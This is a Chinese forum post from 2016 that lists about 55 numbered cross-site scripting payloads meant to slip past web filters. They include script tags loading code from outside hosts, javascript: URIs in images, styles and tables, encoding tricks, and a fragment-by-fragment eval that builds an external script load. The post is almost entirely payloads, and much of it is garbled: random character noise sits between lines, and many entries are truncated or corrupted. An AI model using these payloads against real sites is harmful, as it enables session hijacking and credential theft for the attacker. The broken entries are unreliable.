(1)普通的XSS JavaScript注入
/ g* j& A* k4 @! I<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' q" n3 w2 D. Q9 W(99)另类弹框! C0 j7 Y9 D% [# d$ `7 |" w' u& h
<q/oncut=alert()>1
& z$ @* _* s' _0 |<s/onclick=alert()>b' |! L' ^ {6 c) T" b+ c: q/ }
<XSS=" onclick="alert(1)//">clickme</SSX=">
: h* P, U* M' D9 f) U! r <zzz onclick=alert`1`>clickme</zzz>
9 Q) j2 Q5 r- D$ \, j5 \ <a onclick=alert`1`>clickme</a>, A$ W: b4 I/ m& @% z9 ?
<a=">clickme</a=">( \: z% f; p* J; Z% p
<a=">clickme</a>
: Z1 A7 v( A; ~<z=">clickme</z=">
! J8 U* ^! z; n3 N" u) w% J<z onclick=alert`1`>clickme</z>
9 N5 i! F& C; C$ L! X
5 U/ c- ~* q! w1 P& G' v(2)IMG标签XSS使用JavaScript命令: q& q {3 V. z1 c
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 b* ]+ U( K2 T+ I R) N& y3 e7 q" {$ N( X* ?; x
(3)IMG标签无分号无引号 @$ O& [9 Z2 e5 V6 |! }
<IMG SRC=javascript:alert(‘XSS’)>2 C6 Z/ y% ~9 ]8 w
, |( J9 Z0 G% H) j8 @/ \7 j(4)IMG标签大小写不敏感5 W1 w- @+ m$ s; O9 o, ~
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
( |. Z' |8 T f! H) p) w- ]+ j6 o* L& i6 M' K8 _; ]4 E
(5)HTML编码(必须有分号)* s0 S3 ^4 N1 t' V$ r( T' j
<IMG SRC=javascript:alert(“XSS”)>+ J+ F1 L. h' h8 l1 y8 E/ w$ ]0 m1 w
3 Q! D& h4 R3 _5 ` [' X( L(6)修正缺陷IMG标签3 W# D& F$ h7 g3 R. g3 D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, ^6 i$ I" O5 O5 V) m0 Z! G
/ Y$ W/ j5 K6 ]+ t- K6 v1 A
(7)formCharCode标签(计算器)
. C) }% H0 z- a/ ^<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) D Z+ u' a' X" ?
+ G/ B* ?, W$ Z# ]/ m# v' S(8)UTF-8的Unicode编码(计算器); D# d! R$ h% s4 K7 N
<IMG SRC=jav..省略..S')>, m3 ^; u+ w7 {4 l/ o
% J, j" T/ X* V9 |* H5 J
(9)7位的UTF-8的Unicode编码是没有分号的(计算器); X% N9 |/ b) L9 Q
<IMG SRC=jav..省略..S')>( U8 P: x1 L# Y9 E0 V6 P
4 A& j: _; c8 @' @% N1 D
(10)十六进制编码也是没有分号(计算器)
* }/ c# u' F4 ~. V<IMG SRC=\'#\'" /span>
7 P P; H, I4 c1 s4 s l8 f5 K+ d6 z
(11)嵌入式标签,将Javascript分开
, Z0 ~9 |. N, C x. m3 Z0 ~<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>6 t/ Z5 x9 w7 v. k% E4 g& i, g
! z' H4 v$ c6 \, V" @' f(12)嵌入式编码标签,将Javascript分开/ L+ a; X2 ~4 N
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 L1 _9 B. d3 g3 Y- D0 R+ m1 A" Z# Z/ ]! O! [* w' \% Z
(13)嵌入式换行符
" b6 P3 [* w/ s* V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 `% Q* D6 l. y+ _. L% q" m
j" u* g$ i" W# V2 }4 h* o6 W% `$ o(14)嵌入式回车+ W! y- o0 B$ F$ u& m4 c0 K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 t3 K/ D9 ~$ b5 i, l
7 \3 ~0 A- G- r5 `% }0 Z- D(15)嵌入式多行注入JavaScript,这是XSS极端的例子
% t% e3 q6 X8 c" G' e( t$ l<IMG SRC=\'#\'" /span>4 ~! p$ ^, }6 I2 e
2 y1 c# i3 \: w9 c. C* T# N
(16)解决限制字符(要求同页面)
4 V3 x9 R5 D- o8 @ P<script>z=’document.’</script>
. m$ f' f" _' y# b) w<script>z=z+’write(“‘</script>
" `) j# J3 B* k9 q# x0 w& ^<script>z=z+’<script’</script>
W! `+ h6 |0 q2 u<script>z=z+’ src=ht’</script>
: w0 e# l0 b p<script>z=z+’tp://ww’</script>( O. c H5 X# }) n
<script>z=z+’w.shell’</script>
" W: T# P& P9 ]4 }+ b4 D8 A# K- y<script>z=z+’.net/1.’</script>
' f2 s/ U/ e/ W) q* T8 C4 d1 s<script>z=z+’js></sc’</script>6 R9 A9 b4 d* e. Z
<script>z=z+’ript>”)’</script>
* |5 d& m- S+ Z<script>eval_r(z)</script>7 o8 l' [: x/ _" d
; D) H) d2 r2 X& [' W0 G6 ~/ }
(17)空字符
I$ \# o7 `1 S( E0 I0 H* T i, w) lperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
M; U' y- p6 |6 G' z) w
1 a) q; X2 ^. d3 @. g" l0 N(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 w/ P% _2 W. operl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' u5 {) B3 h5 }; i# J6 s! \' k0 e1 @% t3 k( x
(19)Spaces和meta前的IMG标签
& l$ p% z3 d5 Z0 _- o& g<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
: k' A8 s4 d( P k8 A: v; N( ]2 T' y0 L& k9 {& Z5 ?
(20)Non-alpha-non-digit XSS2 |6 s) g/ j8 R7 w$ O8 e6 m/ R
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>2 \: T S+ Q# D3 B3 t* n
3 C8 m% g, V' _* H& L8 W. X
(21)Non-alpha-non-digit XSS to 2
: U5 h2 B. l$ K" A# p<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% j2 \2 ?! V# M& C& y$ F$ X# p* L
$ R. r* Q" Y0 d" }6 M(22)Non-alpha-non-digit XSS to 3) m8 O. D9 t+ U* Z4 e3 p
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>1 p+ B/ e) T2 W9 i l$ c
% ]2 B% b& s& d. g( R2 }$ L(23)双开括号
7 m% O( d/ X( P2 v! K<<SCRIPT>alert(“XSS”);//<</SCRIPT>
I* ]0 Q9 `; a8 X8 c! V. s7 X3 e' v7 U0 e1 G! x1 T" q
(24)无结束脚本标记(仅火狐等浏览器)$ B8 Q; `" N4 n- Q# d- n
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 D2 Q. G8 G% q, a) z! I( n
c5 o7 w9 C# y. r ]
(25)无结束脚本标记2: J9 U2 M/ D: |6 q
<SCRIPT SRC=//3w.org/XSS/xss.js>6 X. ^1 Y; N; N% P+ Q
) E4 g4 C+ ~. F2 K9 `% e( e(26)半开的HTML/JavaScript XSS
/ ]9 I+ s- W1 {/ d<IMG SRC=\'#\'" /span>
$ z) Q' d% x, L X. S) |
P; ?- `7 [- Z% H(27)双开角括号- `+ u6 p- m2 ]& f2 z0 F
<iframe src=http://3w.org/XSS.html <( x! l# P7 }, w0 w/ ~+ `# f
$ B* U+ M) G# v; i' p2 \8 M1 h(28)无单引号 双引号 分号7 {: ?! v9 z- a* |0 h! [( ]
<SCRIPT>a=/XSS/
# ` }; V0 X! B, C/ oalert(a.source)</SCRIPT>
/ g1 l4 v- Z z8 \) @/ @. G# c5 M |8 `" ~. T Z, u
(29)换码过滤的JavaScript
" j* {; S9 p/ E+ C0 C\”;alert(‘XSS’);//
# S. l5 @2 D$ F7 o' V. X: o: J
+ z E2 X8 C; a: H0 H0 z" y3 K6 |(30)结束Title标签; L7 I$ Z. f. @, |
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 }! R! ^3 j$ S: ~; {
7 t/ k; Z7 E- j+ o4 r( o4 X" N
(31)Input Image/ U+ Y$ o/ m+ U* V. q& t9 Y( O" |7 b
<INPUT SRC=\'#\'" /span>* s5 v7 G3 _0 j! f# J$ n
7 x; C# `* T2 q' R
(32)BODY Image: t, O: @% i# H5 w
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, @, |8 X3 G3 v$ j* }1 y0 Y; _0 D( h/ A% R8 N
(33)BODY标签: Y1 j, X" a1 j4 D8 m
<BODY(‘XSS’)>
1 U) _2 k0 r/ b t, k" i2 W; `3 r% Z
. V: }4 Q3 ~6 ~0 b7 ^4 t8 V" h(34)IMG Dynsrc
! c1 p- a; z: a5 j7 w0 z( i# m1 V<IMG DYNSRC=\'#\'" /span>
! R7 v( Z( B* i" `9 A$ p W9 Q3 v; c: w$ }' b5 F5 O! o
(35)IMG Lowsrc3 z5 W0 G5 Z( w' |" F
<IMG LOWSRC=\'#\'" /span>
' V8 k+ K/ y/ g1 d! E* p F4 j& N, k, n6 H" _6 ^0 P1 I
(36)BGSOUND
" |0 T* H! Q) G9 a& r! F<BGSOUND SRC=\'#\'" /span>" }* I( E; \ {( c4 X3 _. k
. Z5 \! q# f$ ~8 K; ~) W+ h4 Z2 C(37)STYLE sheet3 h7 o# }+ M) P' p& f4 f
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ c+ {+ S. C7 L' h" f3 j% I
/ ^( c) m" D+ N _
(38)远程样式表
( R6 f: H$ r9 m<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, a5 Y [# H5 ]2 x
/ l: i9 g/ v7 {/ I/ c" [/ K
(39)List-style-image(列表式)- j- U1 ^8 S( P" S' V2 l. A( B8 X' h
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# e4 @! u* d2 i: l* R1 D4 P7 X# Z0 b) W1 U
(40)IMG VBscript- T* R6 Y1 M+ i k. }
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
5 Q8 \) I* Q# B' ~5 g
5 a/ F1 P, o/ z. p+ N, B2 S(41)META链接url
+ H( U: X- O2 X2 [/ s<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>6 s+ }0 p1 Q7 j& A" o1 N
" @. ] M7 G- B# O) j$ j# J(42)Iframe
/ X9 y u: Q) B" G9 M2 ]<IFRAME SRC=\'#\'" /IFRAME>1 `6 p4 i$ c2 @- c3 a) n' C4 `
# X4 W' i; v# s(43)Frame
9 y4 [. S: y! K+ G. l9 a' v0 O<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>( s" G0 l/ H. Q
3 c- r7 l2 ~8 b- H6 H# F& D( Q(44)Table
2 z! ~: \4 o% h( E3 M<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 v, P$ n5 w, B- t( Z! s
+ T5 @) ~8 t; [2 @/ W; D(45)TD
; Z, L: {% R6 M* H1 }+ V! k3 }<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 h* u! X# f# r( j5 U$ ]3 `
# R7 \8 f4 K) Z( E9 G `(46)DIV background-image" X3 ]/ h! G$ a0 ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 G& [7 g) o" S) f* H# N7 l1 E8 S5 B) u( |2 H1 L* G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
1 P' y o s+ i C8 x<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
- n" d7 H0 i( U
# b% T' s h; z9 f4 w5 Y0 x(48)DIV expression. s. j. t( D5 S) Y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" V* e" s) i. K# [/ [
1 i% q( O% @' Y/ a) i& w(49)STYLE属性分拆表达
) H9 E- k6 W2 S4 g6 U* e! y<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>. T# W) m, f! p& ?* B. g
6 O: C! D2 r, O4 Q3 m/ F" G7 w(50)匿名STYLE(组成:开角号和一个字母开头)& h9 K; n/ x0 a- }
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' V# j6 b! S; n ?/ |$ u) L' P' f; \% {% e/ }
(51)STYLE background-image1 \" T: X: _; K: p9 I6 x6 [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>1 r) s$ ?+ X, q6 _8 o- O% d* I
8 t3 ?- c/ Y' V+ V }' q7 I
(52)IMG STYLE方式# a' O# W l8 x' g I- ]' ?4 k! p
exppression(alert(“XSS”))’>0 p: a1 }2 X! L
* u, d5 F4 C9 K
(53)STYLE background7 g, y( c. p! w% L
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
8 O# |! v! p3 c) c
' ~" k' C" ?5 Q; n(54)BASE8 B3 ? l& l5 ~& p$ c- x
<BASE HREF=”javascript:alert(‘XSS’);//”>
7 h6 n! ?/ x* L1 q8 ~# P3 |7 J0 e8 A7 h/ Z5 }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 i6 b0 a+ \4 j8 a: ~$ h
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>7 c$ x1 h4 j/ b9 }) R8 s+ E! r: p
|
发表于 2016-4-28 10:06:15
收藏
支持
反对